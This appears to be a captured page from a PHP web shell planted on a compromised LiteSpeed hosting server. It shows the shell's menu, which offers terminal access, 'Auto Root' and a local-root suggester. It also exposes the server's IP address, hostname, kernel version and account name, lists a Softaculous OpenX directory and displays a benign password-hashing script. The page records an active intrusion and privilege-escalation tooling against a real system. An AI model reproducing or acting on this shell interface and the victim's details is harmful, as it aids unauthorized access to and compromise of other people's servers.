Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.217.55
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
openx /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2022-11-25 16:11
php53
[ DIR ]
drwxr-xr-x
2022-11-25 16:11
php56
[ DIR ]
drwxr-xr-x
2022-11-25 16:11
php71
[ DIR ]
drwxr-xr-x
2022-11-25 16:11
php81
[ DIR ]
drwxr-xr-x
2022-11-25 16:11
_edit.php
3.42
KB
-rw-r--r--
2022-04-18 06:48
_edit.xml
433
B
-rw-r--r--
2022-04-18 06:48
default.conf.php
79
B
-rw-r--r--
2021-12-23 06:54
extend.php
8.76
KB
-rw-r--r--
2022-09-21 04:58
fileindex.php
411
B
-rw-r--r--
2021-12-23 06:54
import.php
4.81
KB
-rw-r--r--
2022-09-21 04:58
info.xml
2.37
KB
-rw-r--r--
2022-09-21 04:18
install.js
921
B
-rw-r--r--
2021-12-23 06:54
install.php
8.09
KB
-rw-r--r--
2022-09-21 04:58
install.xml
2.51
KB
-rw-r--r--
2022-04-18 06:48
md5
7.96
KB
-rw-r--r--
2022-09-21 04:58
notes.txt
673
B
-rw-r--r--
2022-04-18 06:48
openx.sql
105.97
KB
-rw-r--r--
2022-05-13 07:38
openx.zip
12.34
MB
-rw-r--r--
2022-05-13 07:38
softaculous.conf.php
8.03
KB
-rw-r--r--
2022-04-18 06:48
update_pass.php
497
B
-rw-r--r--
2022-04-18 06:48
upgrade.php
5.69
KB
-rw-r--r--
2022-09-21 04:58
upgrade.xml
476
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if(!defined('PASSWORD_BCRYPT')){ define('PASSWORD_BCRYPT', 1); } define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); $resp = password_hash('[[admin_pass]]', PASSWORD_DEFAULT); echo '<update_pass>'.$resp.'</update_pass>'; ?>